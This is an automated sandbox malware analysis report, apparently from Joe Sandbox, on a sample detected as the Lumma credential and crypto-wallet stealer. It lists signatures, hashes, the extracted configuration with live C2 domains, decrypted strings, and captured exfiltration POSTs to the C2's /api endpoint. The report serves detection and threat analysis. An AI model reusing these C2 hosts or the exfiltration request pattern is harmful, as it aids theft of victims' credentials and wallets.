Windows Analysis Report
o7b91j8vnJ.exe

Overview

General Information

Sample name: o7b91j8vnJ.exe (renamed because the original name is a hash value)
Original sample name: 7b3e62bcbeed62a180220669f6a0c548.exe
Analysis ID: 1431408
MD5: 7b3e62bcbeed62a180220669f6a0c548
SHA1: 3d12e7bf87ce03fe4c59c5127e225dfd37b7a530
SHA256: 32cad0a627c9f3bf1172d0fc11a5492b2ff20e3e5509f53e0ac83e87d15f2a5d
Tags: 32, exe, trojan

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • o7b91j8vnJ.exe (PID: 6856 cmdline: "C:\Users\user\Desktop\o7b91j8vnJ.exe" MD5: 7B3E62BCBEED62A180220669F6A0C548)
    • WerFault.exe (PID: 7128 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 1516 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "strollheavengwu.shop"], "Build id": "P6Mk0M--superstar"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1845056806.0000000004265000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0xba8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1845085815.00000000042CC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: o7b91j8vnJ.exe PID: 6856 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: o7b91j8vnJ.exe PID: 6856 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
            No Sigma rule has matched
Timestamp: 04/25/24-01:59:52.426039 | SID: 2052229 | Source Port: 56700 | Destination Port: 53 | Protocol: UDP | Classtype: A Network Trojan was detected
Timestamp: 04/25/24-01:59:52.576860 | SID: 2052230 | Source Port: 49730 | Destination Port: 443 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/25/24-01:59:56.147948 | SID: 2052230 | Source Port: 49734 | Destination Port: 443 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/25/24-01:59:57.117668 | SID: 2052230 | Source Port: 49735 | Destination Port: 443 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/25/24-01:59:53.349065 | SID: 2052230 | Source Port: 49731 | Destination Port: 443 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/25/24-01:59:59.483318 | SID: 2052230 | Source Port: 49737 | Destination Port: 443 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/25/24-01:59:54.263019 | SID: 2052230 | Source Port: 49732 | Destination Port: 443 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/25/24-01:59:58.166541 | SID: 2052230 | Source Port: 49736 | Destination Port: 443 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/25/24-01:59:55.123309 | SID: 2052230 | Source Port: 49733 | Destination Port: 443 | Protocol: TCP | Classtype: A Network Trojan was detected

            AV Detection

Source: o7b91j8vnJ.exe | Avira: detected
Source: https://strollheavengwu.shop/api | Avira URL Cloud: Label: malware
Source: 0.2.o7b91j8vnJ.exe.400000.0.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "strollheavengwu.shop"], "Build id": "P6Mk0M--superstar"}
Source: tolerateilusidjukl.shop | Virustotal: Detection: 14%
Source: shortsvelventysjo.shop | Virustotal: Detection: 16%
Source: https://strollheavengwu.shop/api | Virustotal: Detection: 10%
Source: https://strollheavengwu.shop/apie | Virustotal: Detection: 5%
Source: demonstationfukewko.shop | Virustotal: Detection: 18%
Source: productivelookewr.shop | Virustotal: Detection: 16%
Source: shatterbreathepsw.shop | Virustotal: Detection: 17%
Source: https://strollheavengwu.shop/d | Virustotal: Detection: 9%
Source: alcojoldwograpciw.shop | Virustotal: Detection: 17%
Source: https://strollheavengwu.shop/e | Virustotal: Detection: 9%
Source: incredibleextedwj.shop | Virustotal: Detection: 14%
Source: liabilitynighstjsko.shop | Virustotal: Detection: 17%
Source: o7b91j8vnJ.exe | Virustotal: Detection: 42%
Source: o7b91j8vnJ.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: demonstationfukewko.shop
Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: liabilitynighstjsko.shop
Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: alcojoldwograpciw.shop
Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: incredibleextedwj.shop
Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: shortsvelventysjo.shop
Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: shatterbreathepsw.shop
Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: tolerateilusidjukl.shop
Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: productivelookewr.shop
Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: strollheavengwu.shop
Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: P6Mk0M--superstar
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_00415999 CryptUnprotectData, 0_2_00415999

            Compliance

Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Unpacked PE file: 0.2.o7b91j8vnJ.exe.400000.0.unpack
Source: o7b91j8vnJ.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: Binary string: C:\makeba20\noxadikayovic.pdb | source: o7b91j8vnJ.exe
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_00422458
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_0041C540
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov ecx, dword ptr [esp+04h] | 0_2_004357CA
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov edx, dword ptr [esp+04h] | 0_2_004359E2
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov ecx, dword ptr [esp+000000A4h] | 0_2_00414C49
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov ecx, dword ptr [esp+08h] | 0_2_00433D10
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov edx, dword ptr [esp+08h] | 0_2_00433D10
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov eax, dword ptr [esi+70h] | 0_2_00424087
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov eax, dword ptr [esi+70h] | 0_2_00424084
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then movsx eax, byte ptr [esi+ecx] | 0_2_0040D140
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov esi, ebp | 0_2_00403260
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov eax, dword ptr [esi+70h] | 0_2_00423943
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov edx, dword ptr [esi+10h] | 0_2_0041F234
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then inc ebx | 0_2_004142F0
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then push 00000000h | 0_2_0041E451
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h | 0_2_0041A420
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov word ptr [eax], dx | 0_2_0041A420
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then jmp ecx | 0_2_00414596
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov edx, dword ptr [esi+10h] | 0_2_0041F640
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov word ptr [eax], dx | 0_2_004146E6
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov edx, dword ptr [esi+4Ch] | 0_2_0042271D
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then inc eax | 0_2_004137C9
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then movzx ebx, word ptr [edx] | 0_2_0041F828
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h | 0_2_0041A8C0
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 0_2_0042F890
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov byte ptr [ebx], cl | 0_2_0042594F
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov byte ptr [ebx], cl | 0_2_004259CD
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov byte ptr [ebx], cl | 0_2_004259D2
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov ecx, dword ptr [esi+000000E0h] | 0_2_00411A44
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then inc ebx | 0_2_0040FA49
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then movzx ebp, byte ptr [eax+edx] | 0_2_00431A70
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then cmp byte ptr [esi+ebx+01h], 00000000h | 0_2_0041CAEC
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then jmp edx | 0_2_00437C47
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then jmp edx | 0_2_00437C45
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov edx, dword ptr [esi+000000C0h] | 0_2_00413C46
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov eax, dword ptr [esp+0Ch] | 0_2_00421CC7
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov edx, dword ptr [esi+30h] | 0_2_00424CB0
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov ecx, dword ptr [esp+00000084h] | 0_2_00415D7D
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov edx, dword ptr [esi+000005E0h] | 0_2_00413E4A
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov edx, dword ptr [esi+10h] | 0_2_041EF49B
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov edx, dword ptr [00440984h] | 0_2_041E7494
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov eax, dword ptr [esi+70h] | 0_2_041F3BAA
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov esi, ebp | 0_2_041D34C7
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then inc ebx | 0_2_041E4557
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h | 0_2_041EA687
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov word ptr [eax], dx | 0_2_041EA687
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_041F26BF
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then push 00000000h | 0_2_041EE6B8
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_041EC7A7
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then jmp ecx | 0_2_041E47FD
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov edx, dword ptr [esi+000005E0h] | 0_2_041E40B1
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov eax, dword ptr [esi+70h] | 0_2_041F42EE
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov eax, dword ptr [esi+70h] | 0_2_041F42EB
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then cmp byte ptr [esi+ebx+01h], 00000000h | 0_2_041ED377
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then movsx eax, byte ptr [esi+ecx] | 0_2_041DD3A7
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov byte ptr [ebx], cl | 0_2_041F5C39
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov byte ptr [ebx], cl | 0_2_041F5C34
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov edx, dword ptr [esp+04h] | 0_2_04205C49
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then inc ebx | 0_2_041DFCB0
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov ecx, dword ptr [esi+000000E0h] | 0_2_041E1CAB
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then movzx ebp, byte ptr [eax+edx] | 0_2_04201CD7
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then jmp edx | 0_2_04207EAC
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then jmp edx | 0_2_04207EAE
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov ecx, dword ptr [esp+000000A4h] | 0_2_041E4EB0
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov edx, dword ptr [esi+000000C0h] | 0_2_041E3EAD
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov edx, dword ptr [esi+30h] | 0_2_041F4F17
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov eax, dword ptr [esp+0Ch] | 0_2_041F1F2E
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov ecx, dword ptr [esp+08h] | 0_2_04203F77
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov edx, dword ptr [esp+08h] | 0_2_04203F77
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov ecx, dword ptr [esp+00000084h] | 0_2_041E5FE4
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov edx, dword ptr [esi+10h] | 0_2_041EF8A7
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov word ptr [eax], dx | 0_2_041E494D
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov edx, dword ptr [esi+4Ch] | 0_2_041F2984
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov ecx, dword ptr [esp+04h] | 0_2_04205A31
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then inc eax | 0_2_041E3A30
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then movzx ebx, word ptr [edx] | 0_2_041EFA8F
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 0_2_041FFAF7
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h | 0_2_041EAB27
Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 4x nop then mov byte ptr [ebx], cl | 0_2_041F5BB6

            Networking

Source: Traffic | Snort IDS: 2052229 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (strollheavengwu .shop) 192.168.2.4:56700 -> 1.1.1.1:53
Source: Traffic | Snort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.4:49730 -> 172.67.163.209:443
Source: Traffic | Snort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.4:49731 -> 172.67.163.209:443
Source: Traffic | Snort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.4:49732 -> 172.67.163.209:443
Source: Traffic | Snort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.4:49733 -> 172.67.163.209:443
Source: Traffic | Snort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.4:49734 -> 172.67.163.209:443
Source: Traffic | Snort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.4:49735 -> 172.67.163.209:443
Source: Traffic | Snort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.4:49736 -> 172.67.163.209:443
Source: Traffic | Snort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.4:49737 -> 172.67.163.209:443
Source: Malware configuration extractor | URLs: demonstationfukewko.shop
Source: Malware configuration extractor | URLs: liabilitynighstjsko.shop
Source: Malware configuration extractor | URLs: alcojoldwograpciw.shop
Source: Malware configuration extractor | URLs: incredibleextedwj.shop
Source: Malware configuration extractor | URLs: shortsvelventysjo.shop
Source: Malware configuration extractor | URLs: shatterbreathepsw.shop
Source: Malware configuration extractor | URLs: tolerateilusidjukl.shop
Source: Malware configuration extractor | URLs: productivelookewr.shop
Source: Malware configuration extractor | URLs: strollheavengwu.shop
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: strollheavengwu.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 58; Host: strollheavengwu.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=be85de5ipdocierre1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 18167; Host: strollheavengwu.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=be85de5ipdocierre1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8788; Host: strollheavengwu.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=be85de5ipdocierre1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 20441; Host: strollheavengwu.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=be85de5ipdocierre1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 5438; Host: strollheavengwu.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=be85de5ipdocierre1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 1412; Host: strollheavengwu.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=be85de5ipdocierre1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 574078; Host: strollheavengwu.shop
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: strollheavengwu.shop
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: strollheavengwu.shop
Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.3.dr | String found in binary or memory: http://upx.sf.net
Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
